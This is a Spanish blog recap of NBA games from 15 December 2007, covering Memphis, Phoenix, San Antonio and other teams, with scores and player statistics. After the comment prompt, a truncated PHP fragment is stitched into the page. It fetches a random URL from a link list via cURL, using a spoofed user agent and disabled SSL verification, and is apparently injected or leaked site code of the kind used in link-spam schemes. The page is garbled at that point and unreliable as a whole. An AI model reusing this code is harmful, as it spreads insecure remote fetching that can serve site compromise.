La crónica (15/12/07)

16 de December de 2007 por txusma

De nuevo jornada de muchos partidos en la NBA, tantos que hemos tenido de todo: Derrota de Phoenix Suns ante los Hornets de Chris Paul que superó a su ídolo Steve Nash, victoria de los Memphis Grizzlies de la mano de un inconmesurable Juan Carlos Navarro ante unos de los equipos que más fuerte habían empezado la temporada, nueva victoria de Washington sin su supuesta estrella Gilbert Arenas, derrotas de Cleveland y New Jersey que últimamente no levantan cabeza y etcétera, etcétera. Con ustedes, la crónica.

 


Atlanta 93 – Charlotte 84

Los Hawks siguen sin mostrar signos de mejora pero por lo menos ganan sus partidos, cosa esencial si quieren romper la racha de 8 años consecutivos sin pisar los playoffs, la ás larga de la NBA. Jugando sin Josh Childress ni Acie LAw, Joe Johnson lideró una vez más al equipo y consiguió 31 puntos, 4 rebotes y 6 asistencias que unidos a los 20 ptos y 5 rebotes de Marvin Williams sirvieron para derrotar a unos pobres Bobcats que no pusieron en apuros a los jóvenes Hawks. Por parte felina jugó su primer partido Nazr Mohameed del que se espera que potencie su pobre juego interior. Lejos de su mejor momento de forma y sin conocer los patrones de juego de su nuevo equipo acabó con unos pobres 6 puntos y 3 rebotes, lejos de las figuras de su equipo Gerarld Wallace con 24 pts y 7 rbs y Emeka Okafor con 14-14.

Memphis 123 – Orlando 119

Después de muchas decepciones al fin ganaron los Grizzlies un partido igualado. Rudy Gay con 32 pts y la Bomba Navarro con 27 fueron los principales culpables de la victoria y precisamente dos triples de Juanqui, uno a 2:58 del final y otro quedando 45 seg, fueron esencial para conseguir el triunfo. Miker Miller también realizó un sólido partido con 19 pts, 8 rebotes y 8 asistencias. Orlando, por su parte, parece que entra en minicrisis perdiendo 4 de sus ultimos 5 partidos y su futuro se vuelve aun más negro con la baja por lesión de Rashard Lewis. Sin Lewis el equipo queda a merced de Howard y Turkglu que ayer fueron los mejores de su equipo con 31 pts y 20 reb por parte del primero y 24 tantos del segundo.

Sacramento 79 – Washington 92

En un partido caracterizado por las bajas en ambos equipos (Kevin Martin, Bibby, Rahim, Arenas, Daniels…) unos Wizards con tan sólo 9 jugadores sanos se llevaron el gato al agua de la mano de Stevenson con 19 pts y 7 asistencias y Haywood con 17 pts y 11 rebotes que superaron en prestaciones a los clásicos Caron Butler y Antawn Jamison que, aunque flojos en el aspecto anotador, aportaron en el resto de facetas del juego. Los Kings no pudieron ganar su segundo partido fuera de casa y tan solo Brad Miller jugó un buen partido 21 pts y 9 rebotes, pero se encontró demasiado solo.

Philadelphia 92 – Cleveland 86

Octava derrota en los últimos 9 partidos de los Cavaliers que incluso con Lebron siguen encadenando derrotas, mientras los Sixers siguen en racha ganando su quinto partido de los 6 últimos disputados. Miller e Iguodala con 20 pts por barba y un Dalembert que campó a sus anchas en la pintura con 16 pts y 19 reb fueron los mas destacados por los visitantes. Lebron con 21 pts 6 reb y 6 asistencias, Gooden con 21 pts 10 rebotes e Ilgauskas con 12 puntos y 9 rebotes fueron los mas destacados de unos locales en los que el resto del equipo se dedicó a sestear.

New York 94 – New Jersey 86

Eddie Curry le vió las orejas al lobo y ante los cantos de sirena que sonaban para mandarle al banquillo mostró algo de agresividad y anotó 23 pts ayudando a romper la racha negativa de los Knicks. Le acompañaron Crawford con 32 pts,7 reb y Zach con 20 pts, 13 reb y (¡oh, sorpresa!) 5 asistencias. Los Nets, en cambio, parece que entran en barrena acumulando 5 derrotas en los últimos 6 partidos y lo que es peor dando una mala impresión y sin poder luchas en ningún momento por la victoria. En cuanto a números tan solo Carter con 24 pts y 7 asistencias y Kidd con 18 pts, 7 reb y 7 asistencias estuvieron entonados.

Indiana 106 – Miami 103

En los últimos 9 partidos los Pacers mantienen una preciosa de serie de un partido ganado y uno perdido. Ayer con Jamaal Tinsley y Jermaine O’Neal como principales figuras lograron una importante victoria y dejaron a Miami con los ánimos por los suelos. Granger fue el tercer jugador en discordia acabando con 16 puntos. Wade jugó un buen partido con 24 puntos y 9 asistencias pero acumuló 8 pérdidas y falló el triple que hubiera empatado el partido. Debido a esto se puede considerar a Udonis Haslem, que siempre desde el silencio más absoluto, fue el mejor del partido con 24 puntos y 7 rebotes. Miami, anteriormente un equipo poderoso y temible, se queda con un balance de 6 victorias y 17 derrotas, sonando ya los primeros rumores que sitúan a Pat Riley abandonando el barco.

Phoenix 98 – New Orleans 101

Si Steve Nash acaba el partido con tan solo 12 puntos y 7 asistencias casi se puede apostar a que Phoenix ha perdido. En todo caso ayer los Suns demostraron que pueden sobreponerse a un mal partido de su estrella y con un buen partido de Gran Hill y un gran juego en equipo poner en apuros a uno de los equipos de moda en la NBA. Y este equipo esta en boca de todos en parte por las últimas actuaciones de Chris Paul. El base de tercer año ha anotado más de 20 puntos en 8 de los 9 últimos partidos y unido a las 10 asistencias por partido que promedia está dando la razón a todos los que lo están votando en masa para que acuda a su primer All-Stars. Ayer dirigió con maestria al equipo y unido a un buen acierto en el tiro exterior (12 triples aún teniendo a Pedja lesionado), consiguió llevar a su equipo a la victoria ayudado por Mo Pete (21 puntos), Tyson Chanlder (18 rebotes) y David West (15 puntos y 11 rebotes).

Dallas 96 – Houston 83

En los últimos años Houston no es rival para Dallas y ayer no fue la excepción. Arrastrados por una lesión de T-Mac en el primer cuarto los Rockets no pusieron en apuros a los verdes en ningún momento. Tan solo el chino Yao Ming con 28 puntos y 14 rebotes fue digno rival para los Dirk, Howard y compañia. Exactamente estos 2 jugadores llevaron la voz cantante y entre los 2 anotaron 43 puntos y cogieron 11 rebotes. Además Dirk repartió 8 asistencias, una estadística a la que no nos tiene muy acostumbrados. Steve Francis fue titular pero sigue demostrando que su tiempo en esta liga ya pasó. Una auténtica lástima.

Denver 91 – San Antonio 102

San Antonio sigue siendo un fortín y se mantiene como el único equipo del Oeste que no ha perdido aún ningún partido en casa. Lo peculiar de esta victoria es que no se fundamentó en Tim Duncan y Tony Parker sino en jugadores no-habituales. Parker no jugó debido a una lesión y Duncan volvia después de 4 partidos ausente, de esta manera el protanismo recayó en Fabrizio Oberto y Michael Finley. El primero probablemente jugó el mejor partido desde que está en la NBA y con 21 puntos, 13 rebotes y 5 asistencias se convirtió en la figura indiscutible del encuentro. A su lado un rejuvenecido Michael Finley anotó también 21 puntos. Con un banquillo capaz de tomar el protagonismo en momentos comprometidos, los Spurs vuelven a dar miedo. En los Nuggets si que brillaron los habituales Allen Iverson (30 puntos) y Melo (15 puntos y 9 rebotes). Kleiza cubrió decentemente la baja de Kenyon Martin que parece que se ha convertido en pieza puntal de su equipo.

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>